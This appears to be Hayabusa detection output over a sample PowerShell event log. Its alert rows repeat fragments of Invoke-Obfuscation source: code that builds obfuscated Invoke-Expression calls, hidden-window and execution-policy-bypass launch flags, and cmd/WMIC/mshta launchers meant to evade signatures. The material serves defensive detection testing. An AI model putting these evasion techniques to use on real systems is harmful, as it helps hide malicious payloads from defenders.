@(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. 
If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. 
$EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. 
$NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + ')' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray2) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. 
It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Insert)"" , ""''.Insert.ToString()"")) + '[' + (Get-Random -Input @(3,7,14,23,33)) + ',' + (Get-Random -Input @(10,26,41)) + "",27]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Normalize)"" , ""''.Normalize.ToString()"")) + '[' + (Get-Random -Input @(3,13,23,33,55,59,77)) + ',' + (Get-Random -Input @(15,35,41,45)) + "",46]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Chars)"" , ""''.Chars.ToString()"")) + '[' + (Get-Random -Input @(11,15)) + ',' + (Get-Random -Input @(18,24)) + 
"",19]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.SubString)"" , ""''.SubString.ToString()"")) + '[' + (Get-Random -Input @(3,13,17,26,37,47,51,60,67)) + ',' + (Get-Random -Input @(29,63,72)) + ',' + (Get-Random -Input @(30,64)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.Remove)"" , ""''.Remove.ToString()"")) + '[' + (Get-Random -Input @(3,14,23,30,45,56,65)) + ',' + (Get-Random -Input @(8,12,26,50,54,68)) + ',' + (Get-Random -Input @(27,69)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOfAny)"" , ""''.LastIndexOfAny.ToString()"")) + '[' + (Get-Random -Input @(0,8,34,42,67,76,84,92,117,126,133)) + ',' + (Get-Random -Input @(11,45,79,95,129)) + ',' + (Get-Random -Input @(12,46,80,96,130)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.LastIndexOf)"" , ""''.LastIndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,8,29,37,57,66,74,82,102,111,118,130,138,149,161,169,180,191,200,208,216,227,238,247,254,266,274,285,306,315,326,337,345,356,367,376,393,402,413,424,432,443,454,463,470,491,500,511)) + ',' + (Get-Random -Input @(11,25,40,54,69,85,99,114,141,157,172,188,203,219,235,250,277,293,300,333,348,364,379,387,420,435,451,466,485,518)) + ',' + (Get-Random -Input @(12,41,70,86,115,142,173,204,220,251,278,349,380,436,467)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IsNormalized)"" , ""''.IsNormalized.ToString()"")) + '[' + (Get-Random -Input @(5,13,26,34,57,61,75,79)) + ',' + (Get-Random -Input @(15,36,43,47)) + "",48]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOfAny)"" , ""''.IndexOfAny.ToString()"")) + '[' + (Get-Random -Input 
@(0,4,30,34,59,68,76,80,105,114,121)) + ',' + (Get-Random -Input @(7,37,71,83,117)) + ',' + (Get-Random -Input @(8,38,72,84,118)) + ""]-Join''"" + "")"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @(""([String]''.IndexOf)"" , ""''.IndexOf.ToString()"")) + '[' + (Get-Random -Input @(0,4,25,29,49,58,66,70,90,99,106,118,122,133,145,149,160,171,180,188,192,203,214,223,230,242,246,257,278,287,298,309,313,324,335,344,361,370,381,392,396,407,418,427,434,455,464,475)) + ',' + (Get-Random -Input @(7,21,32,46,61,73,87,102,125,141,152,168,183,195,211,226,249,265,272,305,316,332,347,355,388,399,415,430,449,482)) + ',' + (Get-Random -Input @(8,33,62,74,103,126,153,184,196,227,250,317,348,400,431)) + ""]-Join''"" + "")"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Randomly choose from above invoke operation syntaxes. $NewScript = (Get-Random -Input $InvokeOptions) # Reassemble all components of the final command. $NewScript = $ScriptStringPart1 + $NewScript + '}' # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. 
If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(G",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"et-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. 
$ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). 
#$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.285 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. 
Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. 
.EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. 
$ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. 
